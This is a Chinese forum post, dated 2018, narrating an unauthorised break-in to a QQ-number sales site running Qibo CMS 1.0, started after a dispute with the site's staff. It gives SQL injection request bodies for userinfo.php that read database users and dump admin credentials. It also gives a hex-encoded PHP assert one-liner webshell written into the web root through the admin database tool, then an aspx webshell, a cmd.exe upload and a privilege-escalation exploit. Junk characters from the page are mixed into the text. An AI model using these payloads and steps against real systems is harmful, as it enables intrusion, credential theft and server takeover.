|
; S- @) n. _8 g9 `3 C4 X3 S
9 _6 C" m8 S. q; Y3 S
! i8 L8 F" v1 Z% |. I n- b7 W& P6 K& p5 @4 ^2 F2 m
一、踩点寻找漏洞
5 R" X) m+ a8 Q, L" X
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
+ c1 ?1 y( e, b5 j; Y: d% [
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
: c, b8 L) h0 d; B9 U
先注册一个用户,记住注册时候的邮箱以uid号,
! T" A8 C! `/ @& M
; A( p1 o! E( k& {/ N
; Y$ y* Z$ Z% {! ^' b' K然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
x% a7 m4 Q* u0 W
% {, W# x M; j
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
* U5 K! M2 D) O$ E这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
# ?. o5 n! Y1 N0 A% B G
0 r% W' z3 D; M" M& j确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
9 q; A D( r7 E& _6 G
8 b H$ k6 \0 d- i. j/ T6 u8 u [
+ {9 {" T/ o$ l% `
解密进后台如图:
( B/ y: W- J1 X5 E# Q* O7 ?
3 F* u! z$ y" h, i) R$ z
* \! _! W" V3 c, H( H% {9 d
3 x9 Q Y4 N& ?二、后台getwebshell
" l. z6 x4 ^$ ^! N5 R; X( T' N进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
: t8 l# v+ q% x* P* e
& w# |! D" H: B; i4 U
, h' V$ g7 Z( D4 h% K
5 K f5 j- I- l7 D0 w, u然后点确定,添加提示
% V2 } @* ?7 O
. @3 X- F8 {# D* g5 l: w' X Q
h# Z( z' g$ x; }; Z
& x; A, S5 b2 J; h8 {由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
; Q7 N# a; |) _! c; |
/ V# j. n M. n) i" k
; L& u5 K6 \0 v, l" x
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
1 o2 [+ l& p9 ~# j! ~$ @! r u3 L+ r
如图:
) i0 v H- m9 D' C
8 Z# T1 _# o6 Y# H7 U6 N
, ^, B/ @6 {" n M( `* }
: c$ J& a; p6 X7 Q0 V* Z5 j之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
; T5 F" P' B0 @1 A9 F: A3 w
2 u! v( J, C, v; g# W
/ Y# o3 m7 k& M- H: i i
4 q" c) {4 L0 w" K* k4 T, W
三、提权进服务器
; t' _9 L; N( {* y: p( W
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
/ q( t- q/ ?+ ~/ ^1 p
, F1 C4 W/ j6 }# T3 |* ?
$ X2 y4 _( R- Z& N+ A- {& @3 v
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
' L* m# b" l3 Z8 d* U0 d2 ?
+ i" E! G5 m# `& d. P* E+ p" w |( R
6 L/ G2 i8 y) }2 A5 `5 j8 {然后登陆服务器如图:
- ~) ^/ [7 E1 B$ N
7 i. `7 r- z& z/ d/ p' Z 3 ^# a* A. Z/ V, J( f0 l9 K- X
- `, o; R5 u p, g% n8 q9 A, Q) |" S5 c, ^2 D# f$ Q5 f Y
+ o( o. q O( I) x) Y- i难怪普通刀连接不上,原来是有狗。
& M( H" l$ V" \' y- z
! @4 w" e. p) Q. R" S) f' d& A8 ]
* P% } w! d( \3 l" {4 ] 0 f5 x- X9 J+ c" ~4 C, {5 T
\- ^5 X) z! W- A: F0 J5 f8 d7 c6 {) Q. ?- b1 r! t! x
5 y) @: ~# o6 ` | 
发表于 2018-10-20 20:08:47
收藏
支持
反对